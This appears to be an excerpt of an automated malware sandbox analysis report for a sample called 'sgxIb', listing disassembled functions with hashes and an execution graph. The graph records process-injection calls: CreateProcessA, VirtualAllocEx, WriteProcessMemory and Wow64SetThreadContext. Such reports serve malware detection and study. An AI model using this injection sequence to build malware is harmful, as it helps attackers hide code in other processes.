                                Function 06DD3508 Relevance: .1, Instructions: 80COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8ca3bcff88cf98b3064ebe925f04e60a06d32462d45b4db17d70ebdf7fb29bd4
                                • Instruction ID: 87fda48806c86386db6ff4b1f354aa9b0fd110696c4716f61956d073330acdc9
                                • Opcode Fuzzy Hash: 8ca3bcff88cf98b3064ebe925f04e60a06d32462d45b4db17d70ebdf7fb29bd4
                                • Instruction Fuzzy Hash: 0021C171A093945FDB55EB7888505DEBFB5AF86310F0540A7D041EB252DA318944CBA6
                                Function 06DD3FD0 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bdadd9fd6cc2a4605767b1e9d63b326b97b969d7b28b8d4efd1bb413bb112711
                                • Instruction ID: 7dabd1ef43a59e5586abd0848a7f59d1e49fd340dbbd1660bace24c3a2eb8e33
                                • Opcode Fuzzy Hash: bdadd9fd6cc2a4605767b1e9d63b326b97b969d7b28b8d4efd1bb413bb112711
                                • Instruction Fuzzy Hash: 97213975E112189FDB50EFA9D980AAEBBF5FB48750F118029E905E7350EB39EC40CB90
                                Function 06DDB038 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28ae62ab186e5fafab3889f0f5b3470cfa5917d9391ddf2f7016bfea6c46ecef
                                • Instruction ID: de3af19d620365c3a58edd1e6f083ac6ccb35abf4f5d3b2e9c04297e2d24bf26
                                • Opcode Fuzzy Hash: 28ae62ab186e5fafab3889f0f5b3470cfa5917d9391ddf2f7016bfea6c46ecef
                                • Instruction Fuzzy Hash: C92150B1D107199BDF74DFA9C8406AEBBB5FF86344F11892AD405FB240EB719845CB81
                                Function 06DDA420 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b5aa2d31c31cbaa4e8142046b8efab9cb0989f301296c664fb5e66af09000e3a
                                • Instruction ID: 797c5d7dead53085011d7368eb9d238f6c75f56a685c861f79e55d210c0d7f89
                                • Opcode Fuzzy Hash: b5aa2d31c31cbaa4e8142046b8efab9cb0989f301296c664fb5e66af09000e3a
                                • Instruction Fuzzy Hash: 0E11C231F001141FDB60EB6CE8447AA77E5EB8A214F14C479E60EDB741DD26EC4183D1
                                Function 06DD4318 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9507fb4b03a3b3ee83c3538425acefcc883008077f73a8980cfe489d02cd9dd3
                                • Instruction ID: 9ee91ace29feb7a13c742a4e67275043f6b3e91457a5c7f83da9d0b0b1300b7e
                                • Opcode Fuzzy Hash: 9507fb4b03a3b3ee83c3538425acefcc883008077f73a8980cfe489d02cd9dd3
                                • Instruction Fuzzy Hash: 7B01F135B101100FDB65AA7C881072EB7EADBCA310F14853AE14ACB391E935DC0243A2
                                Function 06DD40E0 Relevance: .1, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f805f3db0040a65a74dc0416f9529b0efd964cce1554b870c996652494879324
                                • Instruction ID: 7f94d9787db825039778feafa0b04f359ca5a653e73786348e9f76202181db1b
                                • Opcode Fuzzy Hash: f805f3db0040a65a74dc0416f9529b0efd964cce1554b870c996652494879324
                                • Instruction Fuzzy Hash: BD115E35B101288FDB54EA78D8246AE77FAFBC8711F058539D50AE7340EE75DC058BA1
                                Function 06DDF2B8 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8f7117e02ecff9e733816ccec29fc71eb2244735da0d7dd22edd771a4ba96070
                                • Instruction ID: e2205674319fa1e2c16cefaa5ad1048c3bd7e11069c7a8565d7fbb80609c7fbc
                                • Opcode Fuzzy Hash: 8f7117e02ecff9e733816ccec29fc71eb2244735da0d7dd22edd771a4ba96070
                                • Instruction Fuzzy Hash: D401D435F111540FCB62A77CD8547AE6BD6DBCA218B14882AE10BCB740DE25DD0243A2
                                Function 06DD3D99 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: afc2daf133aeb5e9ba77f88643d67a1eb80704a072ea6e75bdb8fa2dfb013fde
                                • Instruction ID: cb1d68e0787757200d474702493015716da899898b9b1c84f1f712adb8f79b64
                                • Opcode Fuzzy Hash: afc2daf133aeb5e9ba77f88643d67a1eb80704a072ea6e75bdb8fa2dfb013fde
                                • Instruction Fuzzy Hash: BF21C4B5D01219AFDB10DF9AD885ADEFFB8FB49310F10822AE518A7340D3746954CBE5
                                Function 06DD40D1 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cca477cf89c5355d41446caf1bb848c98a226a0c57933a05b6f4a0e5c2b60165
                                • Instruction ID: d49f5b3399a8601592241690e953c5e700e5af809c56543e936fe3c79290ae70
                                • Opcode Fuzzy Hash: cca477cf89c5355d41446caf1bb848c98a226a0c57933a05b6f4a0e5c2b60165
                                • Instruction Fuzzy Hash: 3101D431B600184BDB549A78DC206EF77FAEBC8310F01413AD50AE7340EE659C0647E1
                                Function 06DD3DA0 Relevance: .1, Instructions: 52COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63dab11c5dbbda478760ee82d5146732f2ef330a787db75ef5b7d45450bc7c02
                                • Instruction ID: 94ef3ae4934af7a80a340bf97dd188e5704040e99ec6a8ee079722d063fe21ed
                                • Opcode Fuzzy Hash: 63dab11c5dbbda478760ee82d5146732f2ef330a787db75ef5b7d45450bc7c02
                                • Instruction Fuzzy Hash: 5411B4B5D01259AFDB00DF9AD884ADEFBB4FB49310F10812AE518B7340D374A954CFA5
                                Function 06DD4328 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de0e0904fba7d2aeb31470f21a4013aa8ccf67c96f2235f06b97dc8b826ea458
                                • Instruction ID: c8bd06a15aa7645439a913137d387b4cad40e65399337c64fda7359b804231f1
                                • Opcode Fuzzy Hash: de0e0904fba7d2aeb31470f21a4013aa8ccf67c96f2235f06b97dc8b826ea458
                                • Instruction Fuzzy Hash: 2D018C35B601240BDB74AA6D9855B2FA3DBDBCA714F20C83AE60EC7394DD75DC424391
                                Function 06DDF2C8 Relevance: .0, Instructions: 49COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 367fc981089f3c692d485020a22a2a4dd2b2f3477a6fae59825f2c4bf37b925c
                                • Instruction ID: c347cc221939b4456f42dd530ff18ebb6da31fe3f8d6e79f59903122a7036047
                                • Opcode Fuzzy Hash: 367fc981089f3c692d485020a22a2a4dd2b2f3477a6fae59825f2c4bf37b925c
                                • Instruction Fuzzy Hash: 57018C35F101180BDB65AB7DE850B2FB7DADBC9628F108839E50BCB340DE65DC424392
                                Function 06DDA430 Relevance: .0, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 22c2ef44ee40b80a3c0ff3cbe6108c86bb3201155c6f505aa2ae2b5a07eea968
                                • Instruction ID: bf2e28921e7badaac5e2a09309f0a13ad1f71ebf15e24cbeab1989214a6123d3
                                • Opcode Fuzzy Hash: 22c2ef44ee40b80a3c0ff3cbe6108c86bb3201155c6f505aa2ae2b5a07eea968
                                • Instruction Fuzzy Hash: BE018C30B001144BDB64EB7CE854B2AB3E6EB8D318F10C838E60EDB740DE29EC028791
                                Function 06DD83E8 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 64ddbc34df9cb27fabdb7627b1875809e435b3b73cfc950143c68481f5a8d305
                                • Instruction ID: 78c6d02d891999d9e2e6593bd0c73670e63e76319cadfd46f6b7e1001ae31705
                                • Opcode Fuzzy Hash: 64ddbc34df9cb27fabdb7627b1875809e435b3b73cfc950143c68481f5a8d305
                                • Instruction Fuzzy Hash: 8FF0AF31F002158FDF66AF58E9802B877BEEB48210F104476C906EB250D77AED05EB91
                                Function 06DD6588 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6f83a4230cae6e86b132794d7e195ba98fb83a34040c1a71eed0bdfbaf3c26e
                                • Instruction ID: be8b3a69908c4ac61ab89973c65419c72c9bf8c6ef30c04ebe0240b916e63c91
                                • Opcode Fuzzy Hash: d6f83a4230cae6e86b132794d7e195ba98fb83a34040c1a71eed0bdfbaf3c26e
                                • Instruction Fuzzy Hash: D4E0D870E152886FDF60EB74DD057AA7BADDB03308F2244E6D805DB246F175D94187D2
                                Function 06DD4B69 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000013.00000002.1639915821.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_19_2_6dd0000_sgxIb.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 63bc6f79ae19a2b234efafc436f15eaeefa0e0dc6a282cf54e102e742a5a5fe7
                                • Instruction ID: 31824ba02f3243f88f0de0241ed8e07906039cc8f01e42ab4083464ff8cf0a1e
                                • Opcode Fuzzy Hash: 63bc6f79ae19a2b234efafc436f15eaeefa0e0dc6a282cf54e102e742a5a5fe7
                                • Instruction Fuzzy Hash: B8F0DA30A50129EFDB14DF95E9587AEBBF2FF48704F250519E402A7294CB701C01CF80

                                Execution Graph

                                Execution Coverage:10.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:141
                                Total number of Limit Nodes:5
                                execution_graph 17675 6d913f8 17676 6d910b4 17675->17676 17676->17675 17677 6d91468 17676->17677 17681 6d92da0 17676->17681 17692 6d92d90 17676->17692 17703 6d92dfe 17676->17703 17682 6d92dba 17681->17682 17686 6d92dde 17682->17686 17715 6d933ec 17682->17715 17720 6d93376 17682->17720 17724 6d937e5 17682->17724 17729 6d93882 17682->17729 17733 6d932c0 17682->17733 17737 6d935d0 17682->17737 17741 6d93291 17682->17741 17746 6d9321f 17682->17746 17686->17677 17693 6d92da0 17692->17693 17694 6d933ec 2 API calls 17693->17694 17695 6d9321f 2 API calls 17693->17695 17696 6d93291 2 API calls 17693->17696 17697 6d935d0 2 API calls 17693->17697 17698 6d932c0 2 API calls 17693->17698 17699 6d93882 2 API calls 17693->17699 17700 6d92dde 17693->17700 17701 6d937e5 2 API calls 17693->17701 17702 6d93376 2 API calls 17693->17702 17694->17700 17695->17700 17696->17700 17697->17700 17698->17700 17699->17700 17700->17677 17701->17700 17702->17700 17704 6d92e01 17703->17704 17705 6d92d8c 17703->17705 17704->17677 17706 6d92dde 17705->17706 17707 6d933ec 2 API calls 17705->17707 17708 6d9321f 2 API calls 17705->17708 17709 6d93291 2 API calls 17705->17709 17710 6d935d0 2 API calls 17705->17710 17711 6d932c0 2 API calls 17705->17711 17712 6d93882 2 API calls 17705->17712 17713 6d937e5 2 API calls 17705->17713 17714 6d93376 2 API calls 17705->17714 17706->17677 17707->17706 17708->17706 17709->17706 17710->17706 17711->17706 17712->17706 17713->17706 17714->17706 17716 6d93401 17715->17716 17750 6d90608 17716->17750 17754 6d90610 17716->17754 17717 6d93c14 17722 6d90608 WriteProcessMemory 17720->17722 17723 6d90610 WriteProcessMemory 17720->17723 17721 6d93350 17721->17686 17722->17721 17723->17721 17725 6d93b0a 17724->17725 17758 6d90470 17725->17758 17762 6d90478 17725->17762 17726 6d93b25 17766 6d90548 17729->17766 17770 6d90550 17729->17770 17730 6d938a0 17730->17686 17735 6d90478 Wow64SetThreadContext 17733->17735 17736 6d90470 Wow64SetThreadContext 17733->17736 17734 6d93277 17734->17686 17735->17734 17736->17734 17739 6d90608 WriteProcessMemory 17737->17739 17740 6d90610 WriteProcessMemory 17737->17740 17738 6d935fe 17739->17738 17740->17738 17742 6d938b5 17741->17742 17774 6d906f9 17742->17774 17778 6d90700 17742->17778 17743 6d93277 17743->17686 17782 6d90c98 17746->17782 17786 6d90c8c 17746->17786 17751 6d90610 WriteProcessMemory 17750->17751 17753 6d906af 17751->17753 17753->17717 17755 6d90658 WriteProcessMemory 17754->17755 17757 6d906af 17755->17757 17757->17717 17759 6d904bd Wow64SetThreadContext 17758->17759 17761 6d90505 17759->17761 17761->17726 17763 6d904bd Wow64SetThreadContext 17762->17763 17765 6d90505 17763->17765 17765->17726 17767 6d90590 VirtualAllocEx 17766->17767 17769 6d905cd 17767->17769 17769->17730 17771 6d90590 VirtualAllocEx 17770->17771 17773 6d905cd 17771->17773 17773->17730 17775 6d9074b ReadProcessMemory 17774->17775 17777 6d9078f 17775->17777 17777->17743 17779 6d9074b ReadProcessMemory 17778->17779 17781 6d9078f 17779->17781 17781->17743 17783 6d90d21 CreateProcessA 17782->17783 17785 6d90ee3 17783->17785 17787 6d90c98 CreateProcessA 17786->17787 17789 6d90ee3 17787->17789 17790 6d94078 17791 6d94203 17790->17791 17793 6d9409e 17790->17793 17793->17791 17794 6d909a0 17793->17794 17795 6d942f8 PostMessageW 17794->17795 17796 6d94364 17795->17796 17796->17793 17641 c3b010 17642 c3b01f 17641->17642 17645 c3b0f8 17641->17645 17655 c3b108 17641->17655 17646 c3b119 17645->17646 17649 c3b13c 17645->17649 17665 c3a48c 17646->17665 17649->17642 17650 c3b134 17650->17649 17651 c3b340 GetModuleHandleW 17650->17651 17652 c3b36d 17651->17652 17652->17642 17656 c3b119 17655->17656 17659 c3b13c 17655->17659 17657 c3a48c GetModuleHandleW 17656->17657 17658 c3b124 17657->17658 17658->17659 17663 c3b7a0 GetModuleHandleW 17658->17663 17664 c3b78f GetModuleHandleW 17658->17664 17659->17642 17660 c3b134 17660->17659 17661 c3b340 GetModuleHandleW 17660->17661 17662 c3b36d 17661->17662 17662->17642 17663->17660 17664->17660 17666 c3b2f8 GetModuleHandleW 17665->17666 17668 c3b124 17666->17668 17668->17649 17669 c3b7a0 17668->17669 17672 c3b78f 17668->17672 17670 c3a48c GetModuleHandleW 17669->17670 17671 c3b7b4 17669->17671 17670->17671 17671->17650 17673 c3a48c GetModuleHandleW 17672->17673 17674 c3b7b4 17673->17674 17674->17650 17797 c34668 17798 c3467a 17797->17798 17799 c34686 17798->17799 17801 c34778 17798->17801 17802 c3479d 17801->17802 17806 c34888 17802->17806 17810 c34878 17802->17810 17808 c348af 17806->17808 17807 c3498c 17807->17807 17808->17807 17814 c34514 17808->17814 17812 c348af 17810->17812 17811 c3498c 17811->17811 17812->17811 17813 c34514 CreateActCtxA 17812->17813 17813->17811 17815 c35918 CreateActCtxA 17814->17815 17817 c359db 17815->17817 17818 c3d4b8 17819 c3d4fe 17818->17819 17823 c3d688 17819->17823 17826 c3d698 17819->17826 17820 c3d5eb 17829 c3b750 17823->17829 17827 c3d6c6 17826->17827 17828 c3b750 DuplicateHandle 17826->17828 17827->17820 17828->17827 17830 c3d700 DuplicateHandle 17829->17830 17831 c3d6c6 17830->17831 17831->17820

                                Executed Functions

                                Function 06D90C8C Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 6d90c8c-6d90d2d 3 6d90d2f-6d90d39 0->3 4 6d90d66-6d90d86 0->4 3->4 5 6d90d3b-6d90d3d 3->5 11 6d90d88-6d90d92 4->11 12 6d90dbf-6d90dee 4->12 6 6d90d3f-6d90d49 5->6 7 6d90d60-6d90d63 5->7 9 6d90d4b 6->9 10 6d90d4d-6d90d5c 6->10 7->4 9->10 10->10 13 6d90d5e 10->13 11->12 14 6d90d94-6d90d96 11->14 18 6d90df0-6d90dfa 12->18 19 6d90e27-6d90ee1 CreateProcessA 12->19 13->7 16 6d90db9-6d90dbc 14->16 17 6d90d98-6d90da2 14->17 16->12 20 6d90da4 17->20 21 6d90da6-6d90db5 17->21 18->19 23 6d90dfc-6d90dfe 18->23 32 6d90eea-6d90f70 19->32 33 6d90ee3-6d90ee9 19->33 20->21 21->21 22 6d90db7 21->22 22->16 24 6d90e21-6d90e24 23->24 25 6d90e00-6d90e0a 23->25 24->19 27 6d90e0c 25->27 28 6d90e0e-6d90e1d 25->28 27->28 28->28 30 6d90e1f 28->30 30->24 43 6d90f80-6d90f84 32->43 44 6d90f72-6d90f76 32->44 33->32 46 6d90f94-6d90f98 43->46 47 6d90f86-6d90f8a 43->47 44->43 45 6d90f78 44->45 45->43 49 6d90fa8-6d90fac 46->49 50 6d90f9a-6d90f9e 46->50 47->46 48 6d90f8c 47->48 48->46 52 6d90fbe-6d90fc5 49->52 53 6d90fae-6d90fb4 49->53 50->49 51 6d90fa0 50->51 51->49 54 6d90fdc 52->54 55 6d90fc7-6d90fd6 52->55 53->52 57 6d90fdd 54->57 55->54 57->57
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D90ECE
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 64d061d502403f7980b08662d1d4cd945061bb1ae801485e51dc0553e5e7c98c
                                • Instruction ID: 56233ab3044e8a3bdfa0a06948874d1848f74812207657c3f4d0b54048288dd0
                                • Opcode Fuzzy Hash: 64d061d502403f7980b08662d1d4cd945061bb1ae801485e51dc0553e5e7c98c
                                • Instruction Fuzzy Hash: 87A14C71D00719DFEF54CF68D8417DEBBB2AF48314F148569E809A7280DB749A85CFA1
                                Function 06D90C98 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 58 6d90c98-6d90d2d 60 6d90d2f-6d90d39 58->60 61 6d90d66-6d90d86 58->61 60->61 62 6d90d3b-6d90d3d 60->62 68 6d90d88-6d90d92 61->68 69 6d90dbf-6d90dee 61->69 63 6d90d3f-6d90d49 62->63 64 6d90d60-6d90d63 62->64 66 6d90d4b 63->66 67 6d90d4d-6d90d5c 63->67 64->61 66->67 67->67 70 6d90d5e 67->70 68->69 71 6d90d94-6d90d96 68->71 75 6d90df0-6d90dfa 69->75 76 6d90e27-6d90ee1 CreateProcessA 69->76 70->64 73 6d90db9-6d90dbc 71->73 74 6d90d98-6d90da2 71->74 73->69 77 6d90da4 74->77 78 6d90da6-6d90db5 74->78 75->76 80 6d90dfc-6d90dfe 75->80 89 6d90eea-6d90f70 76->89 90 6d90ee3-6d90ee9 76->90 77->78 78->78 79 6d90db7 78->79 79->73 81 6d90e21-6d90e24 80->81 82 6d90e00-6d90e0a 80->82 81->76 84 6d90e0c 82->84 85 6d90e0e-6d90e1d 82->85 84->85 85->85 87 6d90e1f 85->87 87->81 100 6d90f80-6d90f84 89->100 101 6d90f72-6d90f76 89->101 90->89 103 6d90f94-6d90f98 100->103 104 6d90f86-6d90f8a 100->104 101->100 102 6d90f78 101->102 102->100 106 6d90fa8-6d90fac 103->106 107 6d90f9a-6d90f9e 103->107 104->103 105 6d90f8c 104->105 105->103 109 6d90fbe-6d90fc5 106->109 110 6d90fae-6d90fb4 106->110 107->106 108 6d90fa0 107->108 108->106 111 6d90fdc 109->111 112 6d90fc7-6d90fd6 109->112 110->109 114 6d90fdd 111->114 112->111 114->114
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D90ECE
                                Memory Dump Source
                                • Source File: 00000015.00000002.1650702103.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_6d90000_sgxIb.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 7748942c72557e49003565afa477289a556db410e25a9d461e9f5bfa4cca9a06
                                • Instruction ID: 1d8c00d9f1e3b35b8a78039516b572617084ef76cf9bad682f97f756704d2669
                                • Opcode Fuzzy Hash: 7748942c72557e49003565afa477289a556db410e25a9d461e9f5bfa4cca9a06
                                • Instruction Fuzzy Hash: 60914B71D00719CFEF54CFA8D841BDEBBB2AF48314F148569E809A7280DB749A85CFA1
                                Function 00C3B108 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 115 c3b108-c3b117 116 c3b143-c3b147 115->116 117 c3b119-c3b126 call c3a48c 115->117 119 c3b15b-c3b19c 116->119 120 c3b149-c3b153 116->120 122 c3b128 117->122 123 c3b13c 117->123 126 c3b1a9-c3b1b7 119->126 127 c3b19e-c3b1a6 119->127 120->119 170 c3b12e call c3b7a0 122->170 171 c3b12e call c3b78f 122->171 123->116 128 c3b1db-c3b1dd 126->128 129 c3b1b9-c3b1be 126->129 127->126 131 c3b1e0-c3b1e7 128->131 132 c3b1c0-c3b1c7 call c3a498 129->132 133 c3b1c9 129->133 130 c3b134-c3b136 130->123 134 c3b278-c3b338 130->134 136 c3b1f4-c3b1fb 131->136 137 c3b1e9-c3b1f1 131->137 138 c3b1cb-c3b1d9 132->138 133->138 165 c3b340-c3b36b GetModuleHandleW 134->165 166 c3b33a-c3b33d 134->166 141 c3b208-c3b211 call c3a4a8 136->141 142 c3b1fd-c3b205 136->142 137->136 138->131 146 c3b213-c3b21b 141->146 147 c3b21e-c3b223 141->147 142->141 146->147 148 c3b241-c3b245 147->148 149 c3b225-c3b22c 147->149 172 c3b248 call c3ba90 148->172 173 c3b248 call c3baa0 148->173 149->148 151 c3b22e-c3b23e call c3a4b8 call c3a4c8 149->151 151->148 153 c3b24b-c3b24e 156 c3b271-c3b277 153->156 157 c3b250-c3b26e 153->157 157->156 167 c3b374-c3b388 165->167 168 c3b36d-c3b373 165->168 166->165 168->167 170->130 171->130 172->153 173->153
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 7fbbd14654d669088b3b3c88ead648b28faeacc2d2ac7df6656dfc15f52e6f61
                                • Instruction ID: c0dbd3b381da2e1309f55940abd415da1962b1faa1688ea14ee521e09169a19e
                                • Opcode Fuzzy Hash: 7fbbd14654d669088b3b3c88ead648b28faeacc2d2ac7df6656dfc15f52e6f61
                                • Instruction Fuzzy Hash: 00715470A10B048FEB24DF2AD45575ABBF1FF88300F008A2EE59AD7A50D775EA45CB91
                                Function 00C34514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 174 c34514-c359d9 CreateActCtxA 177 c359e2-c35a3c 174->177 178 c359db-c359e1 174->178 185 c35a4b-c35a4f 177->185 186 c35a3e-c35a41 177->186 178->177 187 c35a51-c35a5d 185->187 188 c35a60 185->188 186->185 187->188 190 c35a61 188->190 190->190
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 00C359C9
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 2b56c9c0a8e11ff0d9e06c0bdd4a1c166f64950efa3266c47acf5126d6bec521
                                • Instruction ID: b48826fac4d7da5f0e41d471541b0ea08c038660b09ab63e876a4c4f1ba3c505
                                • Opcode Fuzzy Hash: 2b56c9c0a8e11ff0d9e06c0bdd4a1c166f64950efa3266c47acf5126d6bec521
                                • Instruction Fuzzy Hash: 0241D3B0C00B1DCBDB24DFA9C84479EFBB5BF44304F2085AAD418AB251DB756946CF90
                                Function 00C3590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 191 c3590c-c359d9 CreateActCtxA 193 c359e2-c35a3c 191->193 194 c359db-c359e1 191->194 201 c35a4b-c35a4f 193->201 202 c35a3e-c35a41 193->202 194->193 203 c35a51-c35a5d 201->203 204 c35a60 201->204 202->201 203->204 206 c35a61 204->206 206->206
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 00C359C9
                                Memory Dump Source
                                • Source File: 00000015.00000002.1639206026.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_21_2_c30000_sgxIb.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
